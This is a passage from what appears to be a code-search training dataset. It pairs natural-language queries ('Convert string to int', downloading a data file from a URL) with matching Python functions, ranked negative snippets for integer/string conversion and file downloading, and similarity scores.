str(source).encode(\"ascii\") + b\"e\"", "def shot_to_str(shot: int) -> str:\n return f\"{shot+1:04d}\"", "def Int(val):\n try:\n return int(val)\n except ValueError:\n return ''", "def format_num(num):\n if num is None:\n return num\n if (num < 10):\n return '0' + str(num)\n return str(num)", "def getString(self, int: int, int2: int) -> str:\n ...", "def convert_ipv4_to_str(n_int):\n return \".\".join([str(n_int >> n & 0xFF) for n in [24, 16, 8, 0]])", "def to_string(self, increment):\n\n raise Exception(\"Not implemented!\"+self.__class__)", "def number_as_string(x):\n \n numnames = {1 : \"one\", 2 : \"two\", 3 : \"three\", 4 : \"four\", 5 : \"five\", 6 : \"six\", 7 : \"seven\", 8 : \"eight\", 9 : \"nine\",\n 10 : \"ten\", 11 : \"eleven\", 12 : \"twelve\", 13 : \"thirteen\", 14 : \"fourteen\", 15 : \"fifteen\", 16 : \"sixteen\",\n 17 : \"seventeen\", 18 : \"eighteen\", 19 : \"nineteen\", 20 : \"twenty\", 30 : \"thirty\", 40 : \"forty\", 50 : \"fifty\", \n 60 : \"sixty\", 70 : \"seventy\", 80 : \"eighty\", 90 : \"ninety\"}\n \n numparts = []\n needAnd = (x > 100) and (x % 100)\n if x >= 1000:\n numparts.append(numnames[x/1000])\n numparts.append(\"thousand\")\n x %= 1000\n \n if x >= 100:\n numparts.append(numnames[x/100])\n numparts.append(\"hundred\")\n x %= 100\n \n if needAnd:\n numparts.append(\"and\")\n \n if 11 <= x <= 19:\n numparts.append(numnames[x])\n else:\n if x >= 10:\n numparts.append(numnames[(x/10)*10])\n x %= 10\n\n if x > 0:\n numparts.append(numnames[x])\n \n return \" \".join(numparts)", "def gnss2str(gnss_id: int) -> str:\r\n\r\n try:\r\n return GNSSLIST[gnss_id]\r\n except KeyError:\r\n return str(gnss_id)", "def int_2_ip_str(ip_int):\n return socket.inet_ntoa(struct.pack(\"!I\", ip_int))", "def ten(number: int) -> str:\n\n string_form = str(number)\n return string_form if number >= 0 else \"0\" + string_form", "def int_to_python(self, value):\r\n return int(value)", "def ids_to_string(idlist):\r\n if len(idlist) == 1:\r\n return \"{:d}\".format(idlist[0])\r\n else:\r\n return \"-\".join([\"{:d}\".format(id) for id in idlist])", "def to_str(x) -> str:\n return str(x) if x else ''", "def day_str(day):\n return str(day) if day >= 10 else '0' + str(day)", "def day_str(day):\n return str(day) if day >= 10 else '0' + str(day)", "def day_str(day):\n return str(day) if day >= 10 else '0' + 
str(day)", "def CopyToString(self):\n if self.sequence_number is None:\n return None\n\n return '{0:d}'.format(self.sequence_number)", "def transform(s):\n return 'digit ' + str(s)", "def int_to_string(ints, inv_vocab):\n \n l = [inv_vocab[i] for i in ints]\n return l", "def str(x):\n return str(x)[:200]", "def transform(s):\r\n return 'digit ' + str(s)", "def numToStrLabel(self, value):\n zero_count = 3 - len(str(value))\n return zero_count * \"0\" + str(value)", "def makeinputstring(variabel):\r\n if type(variabel) == int:\r\n return str(variabel)\r\n elif type(variabel) == float:\r\n return str(int(float(variabel)))\r\n else:\r\n return str(variabel)", "def int_to_string(ints, inv_vocab):\n\n l = [inv_vocab[i] for i in ints]\n return l", "def __ip2intstr(self, address):\n return str(struct.unpack('!I', address)[0])", "def digitstr(n):\n return ''.join(choice(digits) for _ in range(n))", "def int_to_byte_str(num, size):\n return num.to_bytes(size, byteorder = \"big\")", "def __coordinate_system_to_str__(value_int):\n if value_int == GeometryTopologyData.IJK: return \"IJK\"\n elif value_int == GeometryTopologyData.RAS: return \"RAS\"\n elif value_int == GeometryTopologyData.LPS: return \"LPS\"\n return \"UNKNOWN\"", "def to_str(self) -> str:", "def int_with_commas(number):\n try:\n number = int(number)\n if number < 0:\n return '-' + int_with_commas(-number)\n result = ''\n while number >= 1000:\n number, number2 = divmod(number, 1000)\n result = \",%03d%s\" % (number2, result)\n return \"%d%s\" % (number, result)\n except Exception:\n return \"\"", "def test_int_to_str(self):\n @converters.wrap\n def inner_test(param: str):\n \"\"\"Make sure the parameter was converted correctly.\"\"\"\n self.assertEqual(param, '256')\n inner_test(param=256)", "def InfIntToStr(s, i, n):\n if i == len(s):\n return \"\"\n elif i == 0:\n return str(int(s[i])) + InfIntToStr(s, i + 1, n)\n else:\n return str(int(s[i])).zfill(n) + InfIntToStr(s, i + 1, n)", "def int2bin(n: int) -> str:", "def formatInteger(value):\n return locale.format('%d',int(value),1)", "def act_to_str(act: int):\n if act == 0:\n return \"L\"\n elif act == 1:\n return \"D\"\n elif act == 2:\n return \"R\"\n elif act == 3:\n return \"U\"\n else:\n raise ValueError(\"Invalid action value\")", "def int_format(self):\n ...", "def diff_to_str(diff: int) -> str:\n return 'D{}'.format(diff)", "def quantity_to_string(quantity):\n qdict = {\n '*': '0 or more',\n 'zero_or_more': '0 or more',\n '+': '1 or more',\n 'one_or_more': '1 or more',\n '?': '0 or 1',\n 'zero_or_one': '0 or 1'\n }\n if isinstance(quantity, int):\n return str(quantity)\n else:\n return qdict[quantity]", "def encode(self, value: typing.Union[int, str]) -> int:\n return int(value)", "def intToCommaStr(int_ip):\n import sys\n if sys.version_info < (2, 7):\n return str(int_ip)\n else:\n int_ip = int(int_ip)\n return '{:,d}'.format(int_ip)", "def numList2String(l):\n\treturn ''.join(map(chr, l))", "def strIdx(idx):\n if not isinstance(idx, (int, np.integer)):\n raise ValueError(\"Index must be an integer.\")\n\n return str(idx) if idx >= 0 else str(-idx) + u'\\u0305'", "def int_to_hex(num):\n return hex(num)", "def int_array_to_str(result):\n result = [str(i) for i in result]\n return \"\".join(result)", "def e_int(obj):\n if obj == \"\":\n obj = 0\n num = int(obj)\n return\"{:,}\".format(num)", "def encode_int(n):\n return struct.pack(\">I\", n)", "def binaryToString(num):\n result = []\n for _ in range(32):\n num = num * 2\n result.append(int(num))\n num = num - int(num)\n if num 
== 0:\n break\n else:\n if num != 0:\n return 'ERROR'\n return ''.join(str(x) for x in result)", "def valueToString():", "def str(x) -> String:\n pass", "def cond_int2str(cond_int=0):\n try:\n return {\n 0: '晴',\n 1: '多云',\n 2: '阴',\n 3: '阵雨',\n 4: '雷阵雨',\n 5: '雷阵雨伴有冰雹',\n 6: '雨夹雪',\n 7: '小雨',\n 8: '中雨',\n 9: '大雨',\n 10: '暴雨',\n 11: '大暴雨',\n 12: '特大暴雨',\n 13: '阵雪',\n 14: '小雪',\n 15: '中雪',\n 16: '大雪',\n 17: '暴雪',\n 18: '雾',\n 19: '冻雨',\n 20: '沙尘暴',\n 21: '小到中雨',\n 22: '中到大雨',\n 23: '大到暴雨',\n 24: '暴雨到大暴雨',\n 25: '大暴雨到特大暴雨25',\n 26: '小到中雪',\n 27: '中到大雪',\n 28: '大到暴雪',\n 29: '浮尘',\n 30: '扬沙',\n 31: '强沙尘暴',\n 53: '霾',\n 99: '无'\n }[cond_int]\n except KeyError as e:\n logging.warning(e)\n return \"-\"", "def convert_action_to_string(self, action_number):\n return str(action_number)", "def str_base(num, base=36, numerals=\"0123456789abcdefghijklmnopqrstuvwxyz\"):\n if base < 2 or base > len(numerals):\n raise ValueError(\"`base` must be between 2 and %i\")\n\n if num == 0:\n return '0'\n\n buf = BytesIO()\n\n if num < 0:\n buf.write(\"-\")\n num = -num\n\n while num:\n buf.write(numerals[num % base])\n num //= base\n\n return buf.getvalue()", "def convert_label_num2string(number, num_types):\n dictionary = empty_label_dictionary(num_types)\n all_labels = list(dictionary.keys())\n return all_labels[number]", "def get_binary_string_rep(number: int) -> str:\n binary = bin(number)[2:].zfill(LENGTH)\n return \".\".join(binary[i: i + 8].zfill(8) for i in range(0, len(binary), 8))", "def get_string(self, n):\n pad = self.get_pad(n)\n string = pad + self.c\n return string", "def to_string(self, name, value):\r\n \r\n return str(value)", "def int_to_hex(n):\r\n #return \"0x%X\" % n\r\n return hex(n)", "def format(id, length=5):\n return str(bin(id))[2:] if len(str(int(id))[2:])>4 else (5-len(str(bin(id))[2:]))*\"0\"+str(bin(id))[2:]", "def convert_dec(integer, base):\n digits = '0123456789ABCDEFGHIJKLMNOP'\n s = Stack()\n while integer:\n s.push(digits[integer%base])\n integer //= base\n b = ''\n while not s.is_empty():\n b += str(s.pop())\n return b", "def to_string(value: Any) -> str:\n return StringConverter.to_string_with_default(value, '')", "def quantity_encoder(i: int) -> str:\n return hex(i).rstrip('L')", "def int_to_base(num, base):\n if base<=0: return '0' \n digits = []\n if (num <0):\n \tcur= -num\n else: cur = num\n while(cur>0):\n\t\tdigits.append(str(cur%base))\n\t\tcur/=base\n if (num <0): digits.append('-')\n digits.reverse()\n\n \n \n return ''.join(digits)", "def fmt_int(value):\n if value is None:\n return -999999999999999\n return int(value)" ]
[ "0.8262509", "0.7803891", "0.7300844", "0.7271281", "0.72517717", "0.718009", "0.7099532", "0.70860934", "0.7008732", "0.69923896", "0.68970364", "0.68703055", "0.6847767", "0.67874974", "0.6779158", "0.676237", "0.67338043", "0.6702256", "0.6671091", "0.6608676", "0.65521425", "0.6549257", "0.64477986", "0.6446148", "0.6391005", "0.63486177", "0.6310224", "0.629431", "0.62617946", "0.62579745", "0.62447256", "0.6213834", "0.61957455", "0.61919284", "0.6186289", "0.61788934", "0.6176745", "0.617019", "0.6161873", "0.6141049", "0.6140734", "0.61225206", "0.61205983", "0.6116312", "0.60901433", "0.6064586", "0.60526735", "0.6042612", "0.604002", "0.60309285", "0.60240746", "0.60240746", "0.60240746", "0.60230374", "0.6008757", "0.6004034", "0.59913284", "0.59823346", "0.5977802", "0.5965295", "0.5947173", "0.59388626", "0.5936797", "0.5914856", "0.58991164", "0.58949023", "0.5894078", "0.5891231", "0.5880289", "0.58697605", "0.5863824", "0.5857353", "0.58536416", "0.5851886", "0.5848337", "0.58477986", "0.58469474", "0.583977", "0.5826761", "0.5816921", "0.580951", "0.5805208", "0.5804311", "0.57969606", "0.5793629", "0.57871675", "0.57863337", "0.5779666", "0.5751204", "0.57451016", "0.57395995", "0.5734787", "0.5719986", "0.5705476", "0.57031614", "0.56831586", "0.5680115", "0.5679112", "0.5678006", "0.5670857" ]
0.78195685
1
Convert string to int
def string_to_int(s):
    return functools.reduce(
        lambda running_sum, c: running_sum * 10 + string.digits.index(c),
        s[s[0] == '-':], 0) * (-1 if s[0] == '-' else 1)
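A minimal usage sketch of the function above (assumes Python 3 and adds the functools and string imports the one-liner relies on; the test values are illustrative):

import functools
import string

# string_to_int as defined above, repeated so this check runs standalone
def string_to_int(s):
    return functools.reduce(
        lambda running_sum, c: running_sum * 10 + string.digits.index(c),
        s[s[0] == '-':], 0) * (-1 if s[0] == '-' else 1)

assert string_to_int('42') == 42
assert string_to_int('-314') == -314
assert string_to_int('0') == 0

The slice s[s[0] == '-':] skips the sign character when present, because the boolean index evaluates to 1 for a leading '-' and to 0 otherwise.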
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _str_to_int(in_str):\n if in_str == '':\n return 0\n return int(in_str, 10)", "def to_int(s: str) -> int:\n try:\n return int(s.replace('_', ''))\n except ValueError:\n return int(ast.literal_eval(s))", "def dec2int(r: str) -> int:", "def to_int(str_val: str) -> int:\n\n return int(str_val) if is_int(str_val) else None", "def toint(s):\n try:\n n = int(s)\n except ValueError:\n n = 0\n return n if n >= 0 else 0", "def to_int(param, in_str):\n try:\n return int(in_str)\n except ValueError:\n return exit_msg(f\"Bad Request: Wrong type, expected 'int' for parameter '{param}'\")", "def byte_str_to_int(str):\n return int.from_bytes(str, byteorder = \"big\")", "def string_to_int(value):\n ival = None\n\n try:\n ival = float(value)\n ival = int(ival)\n except Exception:\n pass\n\n return ival", "def iint(string):\n try:\n return int(string.strip())\n except:\n return 0", "def convert(s):\n\n try:\n\n return int(s)\n except (ValueError, TypeError) as e:\n print(\"conversion error {}\".format(str(e)), file=sys.stderr)\n pass\n return -1", "def str_to_int(inp, default=None):\n try:\n return int(inp)\n except ValueError:\n return default", "def parse_string_int(text: str) -> int:\n if not text:\n raise ValueError(\"Text to convert cannot be empty.\")\n if not isinstance(text, str):\n raise ValueError(\"Text to convert cannot be a string.\")\n try:\n return int(text)\n except ValueError as e:\n if text in _int_values:\n return _int_values[text]\n raise ValueError(\n \"Unable to convert '{0}' into int.\".format(text)) from e", "def _str_to_int(x):\n if x == None or x == '':\n return 0\n return int(x)", "def safe_int(str):\n if not str:\n return None\n try:\n return int(str)\n except ValueError:\n return 0", "def make_int(int_string):\n\n if int_string.isdigit():\n return int(int_string)\n else:\n return -1", "def convertInt(s):\n try:\n int(s)\n return \"INT\"\n except:\n return s", "def safeint(s):\n try:\n return int(force_unicode(s))\n except (ValueError, TypeError):\n return 0", "def try_parse_int(string):\n try:\n return int(string)\n except Exception:\n return 0", "def parse(value):\n return int(value)", "def getNumFromString(self, string):\n \n m = re.search(r'\\d+$', string)\n if m is not None:\n return int(m.group())\n else:\n return 0", "def intparse(text):\n return int(text, 0)", "def stringToInt(*args):\n return _libsbml.SBO_stringToInt(*args)", "def _as_int(self, int_string, int_description):\n try:\n return int(int_string)\n except ValueError:\n raise ftputil.error.ParserError(\n \"non-integer {} value {!r}\".format(int_description, int_string)\n )", "def _Int(s):\n try:\n return int(s)\n except ValueError:\n assert '.' 
not in s # dots aren't allowed in individual element names\n return s", "def value_from_str(self, s):\n try:\n return int(s)\n except ValueError:\n return super().value_from_str(s)", "def bin2int(r: str) -> int:", "def str2num(s):\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return float(s)", "def hex2int(r: str) -> int:", "def _try_int(self, string):\n value = re.sub(r\"[^0-9]+\", '', string)\n try:\n value = int(value)\n except ValueError:\n value = None\n return value", "def int(s):\n if s is None or s == \"\":\n i = -maxsize\n else:\n i = int(s)\n\n return i", "def _cast_to_positive_int(integer_string):\n ret = int(integer_string)\n if ret < 0:\n raise ValueError()\n return ret", "def ip_str_to_int(ip_str):\n return int(ipaddress.ip_address(ip_str))", "def to_int(value):\n\n if isinstance(value, int):\n return value\n\n elif isinstance(value, string_types):\n return int(value) if value.isdigit() else None", "def to_int(s, fallback=0):\n try:\n result = int(s)\n except ValueError:\n # logging.warning(\"Couldn't cast %s to int\" % s)\n result = fallback\n except TypeError:\n # logging.warning(\"Couldn't cast %s to int\" % s)\n result = fallback\n\n return result", "def parse_number(txt):\n return int(txt)", "def parseInt(s, ret=0):\n if not isinstance(s, str):\n return int(s)\n elif s:\n if s[0] in \"+-\":\n ts = s[1:]\n else:\n ts = s\n\n if ts and all([_ in \"0123456789\" for _ in ts]):\n return int(s)\n\n return ret", "def string_to_integer(value, default=None):\n if value is None:\n return None\n try:\n return abs(int(value))\n except (ValueError, TypeError):\n pass\n try:\n value = ''.join([letter for letter in str(value) if letter.isdigit()])\n return abs(int(value))\n except (ValueError, TypeError):\n return default", "def Int(val):\n try:\n return int(val)\n except ValueError:\n return ''", "def convert_to_int_if_numeric(original_string):\n if original_string.isdigit():\n return int(original_string)\n else:\n return original_string", "def to_int(variable):\n try:\n return int(variable)\n except ValueError:\n return variable", "def check_string_to_int(int_string):\n try:\n if int_string[0] in ('-', '+'):\n return int_string[1:].isdigit()\n\n except TypeError:\n return int(int_string)\n\n return int_string.isdigit()", "def atoi(c: str) -> Union[int, str]:\n return int(c) if c.isdigit() else c", "def string_to_number(string):\n if not string:\n return 0\n try:\n return int(string)\n except ValueError:\n return float(string)", "def __hex2int(_hex_str):\n return int(\"0x\"+_hex_str, 16)", "def parse_int(value):\n if isinstance(value, (int, float)):\n return int(value)\n else:\n return int(value, base=10)", "def str2int(self, video_path):\n try:\n return int(video_path)\n except ValueError:\n return video_path", "def text_to_int(text):\n # type (str) -> int\n try:\n return int(\"\".join(x for x in text if x.isdigit()))\n except ValueError:\n return 0", "def convert_number(s):\n\n try:\n return int(s)\n except ValueError:\n return None", "def integer(self):\n literal = re.compile(r'(0){1}|([1-9])\\d*')\n result = ''\n while self.current_char is not None and self.current_char.isdigit():\n result += self.current_char\n self.advance()\n if literal.fullmatch(result) is not None:\n return int(result)\n else:\n self.error()", "def base_to_int(string, base):\n if string==\"0\" or base <= 0 : return 0 \n result = 0 \n return result", "def hex_to_int(hex_string):\r\n return int(hex_string, 16)", "def pseudo_int(string_num):\r\n int_num = 0\r\n reversed_string_num = string_num[::-1] # 
begin read the characters from the end of the string.\r\n for indexx in range(len(string_num)):\r\n digit = reversed_string_num[indexx]\r\n int_num += (ord(digit) - ord('0')) * 10**indexx # '2698' => 8 * 10**0 + 9 * 10**1 + 6 * 10**2 + 2 * 10**3 = 2698\r\n return int_num", "def toInteger(data):\n\tif isInteger(data):\n\t\treturn data\n\telse:\n\t\treturn ord(data)", "def num(s: str):\n try: return int(s)\n except ValueError: return float(s)", "def try_parse_int(value):\n try:\n return int(value)\n except:\n return 0", "def safe_int(s):\n try:\n return int(s)\n except Exception, e:\n return None", "def perc_str_to_int(string: str) -> int:\n match = re.search(r\"\\((\\d+)%\\)$\", string)\n if match:\n return int(match.group(1))\n raise ValueError(\"Cannot find percentage in table\")", "def bitstr_to_int(a):\n return int(a, 2)", "def SBO_stringToInt(*args):\n return _libsbml.SBO_stringToInt(*args)", "def bytes_to_int(s):\n # int type casts may return a long type\n return int(s.encode('hex'), 16)", "def str_to_num(s):\n\n method = {\n \"float\": string.atof,\n \"int\": string.atoi\n }\n\n if not type(s) is StringType:\n return 0\n\n if \".\" in s:\n return method[\"float\"](s)\n else:\n return method[\"int\"](s, 10)", "def stringToIntegerOrDefault( str_value, default_value=None ):\r\n \r\n # If the value is none, then don't try to convert it\r\n if str_value is None:\r\n return default_value\r\n \r\n # Try to convert the string to an integer\r\n try:\r\n return int(str(str_value).strip())\r\n except ValueError:\r\n # Return none if the value could not be converted\r\n return default_value", "def find_int_in_str(s: str) -> int:\n \n i = int(re.search(r'\\d+', s).group())\n\n return i", "def hex2int(hex_str):\n return int(hex_str, 16)", "def parse_int(self, selector):\n return int(re.sub('[^0-9]', '', self.parse_string(selector)))", "def convertStringToInt(xmlNode):\n try:\n val = int(xmlNode.text)\n return val\n except (ValueError,TypeError):\n raise IOError('Integer value is required for content of node %s, but got %s' %(node.tag, node.text))", "def coerce_to_int(val):\n if isinstance(val, int):\n return val\n if val is None:\n return 0\n # Otherwise, val must be a string, since that's the only other kind of data\n # type that we can create. 
Strip out all non-digit characters.\n new_val = \"\".join([c for c in val if c in map(str, list(range(10)))])\n if new_val == \"\":\n return 0\n return int(new_val)", "def cast_int(v):\n try:\n return int(v)\n except ValueError:\n return v", "def data_to_int(data): \r\n data = str(data).strip().upper()\r\n if data[0]== 'B':\r\n return bin_to_int(data[1:])\r\n elif data[0]== 'H':\r\n return hex_to_int(data[1:])\r\n else:\r\n return int(data, 10)", "def to_int(name, default=0):\n try:\n return int(get(name))\n except (TypeError, ValueError):\n return default", "def find_number(self, string):\n #string = string.encode('ascii', 'ignore')\n #return int(filter(str.isdigit, string))\n s = (re.findall('\\d+', string))\n return int(''.join(s))", "def __rank_from_str_to_int(rank: str) -> int:\n return int(rank) - 1", "def possible_int(arg):\n try:\n return int(arg)\n except ValueError:\n logging.info(f'failed to parse {arg} as an int, treating it as a string')\n return arg", "def is_integer(self, string):\n try:\n return int(string)\n except:\n return False", "def atoi(text: str) -> Union[int, str]:\r\n ...", "def isInt(string):\n try: int(string)\n except ValueError: return 0\n else: return 1", "def char_int(inp_char):\n try:\n nInt = int(inp_char)\n except:\n nInt = 0\n return nInt", "def to_int(num):\n# ast.literal_eval raises an exception if the input isn't\n# a valid Python datatype, so the code won't be executed if it's not.\n if isinstance(num, basestring):\n try:\n num = ast.literal_eval(num)\n except Exception:\n err_message = \"ValueError: Invalid value, must be integer or float\"\n raise Exception(err_message)\n if not isinstance(num, int):\n try:\n num = int(num)\n except Exception:\n err_message = \"ValueError: Invalid datatype, must be integer or float\"\n raise Exception(err_message)\n if num < 1:\n err_message = \"ValueError: Invalid value, must be positive integer\"\n raise Exception(err_message)\n return num", "def parse_int(value):\n try:\n return int(value)\n except (ValueError, TypeError):\n return None", "def str2num(s):\n\n i = 0\n l = 0\n try:\n for i in range(len(s)):\n l = l << 8\n l += ord(s[i])\n return l\n except:\n return 0", "def hash_string_to_int(\r\n k: bytes,\r\n e: str,\r\n) -> int:\r\n return int.from_bytes(hash_string(k, e), 'big')", "def base36_to_int(s: str):\n # To prevent overconsumption of server resources, reject any\n # base36 string that is longer than 13 base36 digits (13 digits\n # is sufficient to base36-encode any 64-bit integer)\n if len(s) > 13:\n raise ValueError(\"Base36 input too large\")\n return int(s, 36)", "def Hex2Int(hexString):\n answer = hexString[0]\n log.debug(f\"Hex {hexString} decoded to {answer}\")\n\n return answer", "def strToDec(string):\n\tstring = string.lstrip(\"0\")\n\tif len(string) == 0:\n\t\treturn 0\n\telse:\n\t\treturn eval(string)", "def getInt(string, radix, needHexPrefix):\n return (0)", "def issn2int(issn_str):\n\n pat = r\"^\\d{4}-\\d{3}[\\dxX]$\"\n p = compile(pat)\n if p.match(issn_str):\n res = 0\n check = map(lambda x: int(x), issn_str[:4] + issn_str[5:8])\n check_bit = int(issn_str[-1]) if is_int(issn_str[-1]) else issn_str[-1]\n for pp in zip(check, range(8, 1, -1)):\n res += pp[0] * pp[1]\n\n rem = (11 - res) % 11\n rem = \"X\" if rem == 10 else rem\n\n if rem == check_bit:\n return int(issn_str[0:4] + issn_str[5:8])\n else:\n logging.error(\n \" issn2int() : in issn {0} \" \"check bit is corrupt\".format(issn_str)\n )\n logging.error(\" equal to {0}, should be {1}\".format(check_bit, rem))\n # raise 
ValueError(' issn2int(): invalid check digit'.format(check_bit, rem))\n return int(issn_str[0:4] + issn_str[5:8])\n\n else:\n logging.error(\n \" issn2int() : issn {0} : does not match \"\n \"the pattern {1}\".format(issn_str, pat)\n )\n\n raise ValueError(\" issn2int(): invalid issn string\")", "def do_convert_integer(text, pos=1):\n if not isinstance(text, basestring):\n text = str(text)\n if not isinstance(pos, int):\n raise TypeError(\"expected: position argument is of type int, got: type {}\".format(type(pos)))\n if pos < 1:\n raise ValueError(\"expected: pos >= 1, got: pos = {}\".format(pos))\n match = re.findall(\"[0-9]+\", text)\n if match:\n try:\n number = int(match[pos - 1])\n except IndexError:\n raise IndexError(\"could not find {} numbers in string '{}'\".format(pos, text))\n return number\n else:\n raise ValueError(\"could not find a number in string '{}'\".format(text))", "def safe_int(int_string: str = \"0\") -> int:\n int_things = [None, \"\", \"-\", \"0\"]\n\n if int_string in int_things:\n return 0\n else:\n return int(int_string)", "def to_number(s):\n ret = s\n try:\n ret = float(s)\n except ValueError:\n ret = ret.strip('\\'').strip()\n return ret\n\n try:\n ret = int(s)\n except ValueError:\n pass\n return ret", "def string_id_to_integer(front_type_string):\n\n check_front_type(front_type_string)\n if front_type_string == WARM_FRONT_STRING_ID:\n return WARM_FRONT_INTEGER_ID\n\n return COLD_FRONT_INTEGER_ID", "def try_as_int( i ) : \r\n\r\n try : \r\n\r\n ret = int( i )\r\n if ret != i : \r\n raise exceptions.Exception(\"conversion failed\")\r\n\r\n except :\r\n raise Eggog( \"'%s': failed to convert to a (Python) integer!\" % (repr(i), ) ) \r\n\r\n return ret", "def _coerce_to_integer(value):\n try:\n return int(value)\n except ValueError:\n return int(float(value))", "def convert_to_num(version_str):\n if not version_str:\n return 0\n if str(version_str).isdigit():\n return version_str\n version_str = version_str.replace(\".\", \"\")\n return int(version_str) if version_str.isdigit() else 0", "def isInt(astring):\n try: int(astring)\n except ValueError: return 0\n else: return 1", "def normalise_string(value):\n try:\n return int(value, 0)\n except ValueError:\n return normalise_bytes(value)", "def get_integer(self):\n string = ''\n while self.current_char is not None and self.current_char.isdigit():\n string += self.current_char\n self.advance()\n return int(string)", "def __file_from_str_to_int(rank: str) -> int:\n # Warning, my own, not very well tested implementation of base26 converter\n values = []\n for letter in rank:\n values.append(ascii_lowercase.index(letter.lower()))\n index_value = 0\n counter = 0\n for value in reversed(values):\n if counter < 1:\n index_value += value\n else:\n index_value += (value * 26) ** counter\n counter += 1\n return index_value", "def base32_to_int(s):\n mistyped = False\n if s.find('o') > -1 or s.find('i') > -1 or s.find('l') > -1:\n s = s.replace('o', '0').replace('i', '1').replace('l', '1')\n mistyped = True\n decoded = 0\n multi = 1\n while len(s) > 0:\n decoded += multi * base32_digits.index(s[-1:])\n multi = multi * 32\n s = s[:-1]\n if mistyped:\n raise MistypedIDException(decoded)\n return decoded", "def make_int(value):\n return int(value[0])", "def try_int_cast(value):\n try: \n return int(value)\n except:\n return value" ]
[ "0.82145184", "0.8003485", "0.79868853", "0.79608244", "0.7875066", "0.7750694", "0.7643904", "0.76203454", "0.7554625", "0.75325245", "0.7502179", "0.7484789", "0.74722457", "0.7454978", "0.7444927", "0.7426303", "0.7408998", "0.74060065", "0.73542196", "0.72918594", "0.7284529", "0.72715396", "0.7265521", "0.7259769", "0.72575045", "0.7250934", "0.7247325", "0.7244533", "0.7221429", "0.7219588", "0.72059864", "0.7203081", "0.7162925", "0.71446407", "0.7105776", "0.7101248", "0.7059997", "0.70463896", "0.70354307", "0.70235336", "0.7015917", "0.7006769", "0.69973826", "0.69816077", "0.69788283", "0.69647706", "0.69441617", "0.6944083", "0.6926748", "0.6921629", "0.6903126", "0.68645895", "0.68430555", "0.6812578", "0.6796587", "0.6757562", "0.6757368", "0.6752958", "0.6749515", "0.6747937", "0.674277", "0.67401654", "0.67323864", "0.6723966", "0.6696723", "0.6691156", "0.6686279", "0.6680411", "0.6679265", "0.6677268", "0.6674578", "0.66712993", "0.6667335", "0.66542053", "0.66538465", "0.66477305", "0.66455036", "0.6642254", "0.6637777", "0.6636191", "0.6628659", "0.6623607", "0.6622061", "0.6617363", "0.6612083", "0.660638", "0.6593814", "0.65818334", "0.6581461", "0.657959", "0.65558475", "0.65204364", "0.6518275", "0.6503089", "0.64990526", "0.64931285", "0.64799434", "0.6477363", "0.6472366", "0.64713675" ]
0.7517601
10
This method retrieves a data file from an internet location. Make sure it is not password protected or anything.
def get_data_file(url, local_file, headers={}):
    req = urllib2.Request(url=url)
    for key in headers:
        req.add_header(key, headers[key])
    site = urllib2.urlopen(req)
    data = site.read()
    headers = site.info()
    site.close()
    output = open(local_file, 'w')
    output.write(data)
    output.close()
    return data, headers
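The snippet above targets Python 2's urllib2. A rough Python 3 port for comparison (the name get_data_file_py3, the 30-second timeout, and the binary write mode are illustrative assumptions, not part of the original):

import urllib.request

def get_data_file_py3(url, local_file, headers={}):
    # Build the request and attach any extra headers, as the urllib2 version does
    req = urllib.request.Request(url=url, headers=dict(headers))
    with urllib.request.urlopen(req, timeout=30) as site:
        data = site.read()      # remote file contents as bytes
        headers = site.info()   # response headers
    # Save a local copy; binary mode because read() returns bytes in Python 3
    with open(local_file, 'wb') as output:
        output.write(data)
    return data, headers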
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_data(location):\n # This is factored out so we can use a different retrieval method if required.\n # Originally used urllib2, but it had SSL issues on my machine\n response = requests.get(location)\n return response.content", "def web_get_file(self, url):\n try:\n print(url)\n response = requests.get(url, verify=False)\n file_buffer = BytesIO(response.content)\n file_buffer.seek(0)\n return file_buffer\n except:\n print(traceback.print_exc())\n return None", "def json_file():\r\n urlretrieve(URL, PATH)\r\n return PATH", "def json_file():\r\n urlretrieve(URL, PATH)\r\n return PATH", "def download_remote_data_file(data_url: str) -> str:\r\n # Create a data directory if it doesn't exist.\r\n data_dir_path = _find_or_create_dir(DATA_FOLDER)\r\n \r\n # Download the data file if it doesn't exist.\r\n filename = os.path.basename(urlparse(data_url).path)\r\n data_file_path = os.path.join(data_dir_path, filename)\r\n if not os.path.exists(data_file_path):\r\n print(f'Downloading data file {data_file_path}...')\r\n with urlopen(data_url) as response:\r\n with open(data_file_path, \"wb\") as data_file:\r\n shutil.copyfileobj(response, data_file)\r\n print('Done downloading data file.')\r\n\r\n return data_file_path", "def download_data(self, filename=None):\n if (filename is None): filename = ['Public','Gathering.dat']\n elif (type(filename) is str): filename = [filename]\n elif (type(filename) is list): pass\n else: raise TypeError('Require the file path (\\'Public/Gathering.dat\\')')\n\n self.newportxps.ftpconn.connect(**self.newportxps.ftpargs)\n remote_path = posixpath.join(self.newportxps.ftphome, *filename)\n self.newportxps.ftpconn.cwd(remote_path)\n self.newportxps.ftpconn.save(posixpath.basename(remote_path), posixpath.basename(remote_path))\n self.newportxps.ftpconn.close()", "def download():\n toydata = requests.get(DATA_URL).json()\n return toydata", "def ReadRemoteFile(url) -> bytes:\n local_url = download_util.DownloadResource(url)\n return file_util.OpenFile(local_url).read()", "def get_datafile(file_):\n\n if os.path.exists(file_):\n return file_\n else:\n\n # download file, then return file_ path\n\n (path_, fname) = os.path.split(file_)\n if path_ == '':\n path_ = '.' # relative to current path\n\n try:\n resp = urllib_request.urlopen(urljoin(DATA_SERVER, fname))\n except urllib_request.HTTPError as ex:\n ex.msg = (\"{0}. 
